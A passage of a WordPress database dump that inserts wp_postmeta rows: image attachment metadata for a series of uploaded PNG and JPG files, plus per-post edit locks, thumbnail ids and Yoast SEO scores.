(14766, 6290, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-12.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-12-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-12-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-12-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-12-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-12-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14767, 6291, '_wp_attached_file', '2019/11/211162-11.png'),
(14768, 6291, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-11.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-11-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-11-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-11-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-11-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-11-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14769, 6292, '_wp_attached_file', '2019/11/211162-10.png');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(14770, 6292, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-10.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-10-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-10-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-10-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-10-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-10-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14771, 6293, '_wp_attached_file', '2019/11/211162-09.png'),
(14772, 6293, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-09.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-09-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-09-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-09-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-09-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-09-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14773, 6294, '_wp_attached_file', '2019/11/211162-08.png'),
(14774, 6294, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-08.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-08-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-08-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-08-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-08-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-08-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14775, 6295, '_wp_attached_file', '2019/11/211162-07.png'),
(14776, 6295, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-07.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-07-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-07-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-07-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-07-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-07-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14777, 6296, '_wp_attached_file', '2019/11/211162-06.png'),
(14778, 6296, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-06.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-06-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-06-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-06-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-06-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-06-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14779, 6297, '_wp_attached_file', '2019/11/211162-05.png'),
(14780, 6297, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-05.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-05-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-05-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-05-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-05-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-05-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14781, 6298, '_wp_attached_file', '2019/11/211162-04.png'),
(14782, 6298, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-04.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-04-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-04-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-04-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-04-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14783, 6299, '_wp_attached_file', '2019/11/211162-03.png'),
(14784, 6299, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-03.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-03-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-03-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-03-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-03-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-03-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14785, 6300, '_wp_attached_file', '2019/11/211162-02.png'),
(14786, 6300, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-02.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-02-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-02-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-02-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-02-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-02-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14787, 6301, '_wp_attached_file', '2019/11/211162-01.png'),
(14788, 6301, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2019/11/211162-01.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-01-300x193.png\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"211162-01-768x494.png\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"211162-01-1024x659.png\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-01-400x258.png\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14789, 6302, '_wp_attached_file', '2019/11/211162-17.jpg'),
(14790, 6302, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/11/211162-17.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-17-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-17-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14791, 6303, '_wp_attached_file', '2019/11/211162-16.jpg'),
(14792, 6303, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/11/211162-16.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-16-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-16-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-16-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14793, 6304, '_wp_attached_file', '2019/11/211162-15.jpg'),
(14794, 6304, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:21:\"2019/11/211162-15.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"211162-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"211162-15-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"211162-15-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(14795, 6285, '_thumbnail_id', '6301'),
(14799, 6285, '_hide_featured', NULL),
(14800, 6285, '_yoast_wpseo_content_score', '60'),
(14801, 6285, '_yoast_wpseo_primary_category', '31'),
(14802, 6285, '_wpas_done_all', '1'),
(14805, 6306, '_edit_lock', '1574301887:14'),
(14806, 6306, '_edit_last', '14'),
(14807, 6306, '_thumbnail_id', '6300'),
(14811, 6306, '_hide_featured', NULL),
(14812, 6306, '_yoast_wpseo_content_score', '60'),
(14813, 6306, '_yoast_wpseo_primary_category', '31'),
(14814, 6306, '_wpas_done_all', '1'),
(14817, 6285, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1574345199;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5769;}i:1;a:1:{s:2:\"id\";i:5994;}i:2;a:1:{s:2:\"id\";i:5962;}}}}'),
(14820, 6308, '_edit_lock', '1574301965:14'),
(14821, 6308, '_edit_last', '14'),
(14822, 6308, '_thumbnail_id', '6299'),
(14826, 6308, '_hide_featured', NULL),
(14827, 6308, '_yoast_wpseo_content_score', '60'),
(14828, 6308, '_yoast_wpseo_primary_category', '31'),
(14829, 6308, '_wpas_done_all', '1'),
(14832, 6310, '_edit_lock', '1574302058:14'),
(14833, 6310, '_edit_last', '14'),
(14834, 6310, '_thumbnail_id', '6298'),
(14838, 6310, '_hide_featured', NULL),
(14839, 6310, '_yoast_wpseo_content_score', '60'),
(14840, 6310, '_yoast_wpseo_primary_category', '31'),
(14841, 6310, '_wpas_done_all', '1'),
(14846, 6312, '_edit_lock', '1574302298:14'),
(14847, 6312, '_edit_last', '14'),
(14848, 6312, '_thumbnail_id', '6297'),
(14852, 6312, '_hide_featured', NULL),
(14853, 6312, '_yoast_wpseo_content_score', '60'),
(14854, 6312, '_yoast_wpseo_primary_category', '31'),
(14855, 6312, '_wpas_done_all', '1'),
(14858, 6314, '_edit_lock', '1574302232:14'),
(14859, 6314, '_edit_last', '14'),
(14860, 6314, '_thumbnail_id', '6296'),
(14864, 6314, '_hide_featured', NULL),
(14865, 6314, '_yoast_wpseo_content_score', '60'),
(14866, 6314, '_yoast_wpseo_primary_category', '31'),
(14867, 6314, '_wpas_done_all', '1'),
(14870, 6316, '_edit_lock', '1574302312:14'),
(14871, 6316, '_edit_last', '14'),
(14872, 6316, '_thumbnail_id', '6295'),
(14876, 6316, '_hide_featured', NULL),
(14877, 6316, '_yoast_wpseo_content_score', '60'),
(14878, 6316, '_yoast_wpseo_primary_category', '31'),
(14879, 6316, '_wpas_done_all', '1'),
(14882, 6318, '_edit_lock', '1574302408:14'),
(14883, 6318, '_edit_last', '14'),
(14884, 6318, '_thumbnail_id', '6294'),
(14888, 6318, '_hide_featured', NULL),
(14889, 6318, '_yoast_wpseo_content_score', '60'),
(14890, 6318, '_yoast_wpseo_primary_category', '31'),
(14891, 6318, '_wpas_done_all', '1'),
(14894, 6320, '_edit_lock', '1574302478:14'),
(14895, 6320, '_edit_last', '14'),
(14896, 6320, '_thumbnail_id', '6293'),
(14900, 6320, '_hide_featured', NULL),
(14901, 6320, '_yoast_wpseo_content_score', '60'),
(14902, 6320, '_yoast_wpseo_primary_category', '31'),
(14903, 6320, '_wpas_done_all', '1'),
(14906, 6322, '_edit_lock', '1574302908:14'),
(14907, 6322, '_edit_last', '14'),
(14908, 6322, '_thumbnail_id', '6292'),
(14912, 6322, '_hide_featured', NULL),
(14913, 6322, '_yoast_wpseo_content_score', '60'),
(14914, 6322, '_yoast_wpseo_primary_category', '31'),
(14915, 6322, '_wpas_done_all', '1'),
(14916, 6324, '_edit_lock', '1574302986:14'),
(14917, 6324, '_edit_last', '14'),
(14918, 6324, '_thumbnail_id', '6291'),
(14922, 6324, '_hide_featured', NULL),
(14923, 6324, '_yoast_wpseo_content_score', '60'),
(14924, 6324, '_yoast_wpseo_primary_category', '31'),
(14925, 6324, '_wpas_done_all', '1'),
(14928, 6326, '_edit_lock', '1574303073:14'),
(14929, 6326, '_edit_last', '14'),
(14930, 6326, '_thumbnail_id', '6290'),
(14934, 6326, '_hide_featured', NULL),
(14935, 6326, '_yoast_wpseo_content_score', '60'),
(14936, 6326, '_yoast_wpseo_primary_category', '31'),
(14937, 6326, '_wpas_done_all', '1'),
(14940, 6328, '_edit_lock', '1574303150:14'),
(14941, 6328, '_edit_last', '14'),
(14942, 6328, '_thumbnail_id', '6289'),
(14946, 6328, '_hide_featured', NULL),
(14947, 6328, '_yoast_wpseo_content_score', '60'),
(14948, 6328, '_yoast_wpseo_primary_category', '31'),
(14949, 6328, '_wpas_done_all', '1'),
(14954, 6330, '_edit_lock', '1574303238:14'),
(14955, 6330, '_edit_last', '14'),
(14956, 6330, '_thumbnail_id', '6288'),
(14960, 6330, '_hide_featured', NULL),
(14961, 6330, '_yoast_wpseo_content_score', '60'),
(14962, 6330, '_yoast_wpseo_primary_category', '31'),
(14963, 6330, '_wpas_done_all', '1'),
(14966, 6332, '_edit_lock', '1574303351:14'),
(14967, 6332, '_edit_last', '14'),
(14968, 6332, '_thumbnail_id', '6287'),
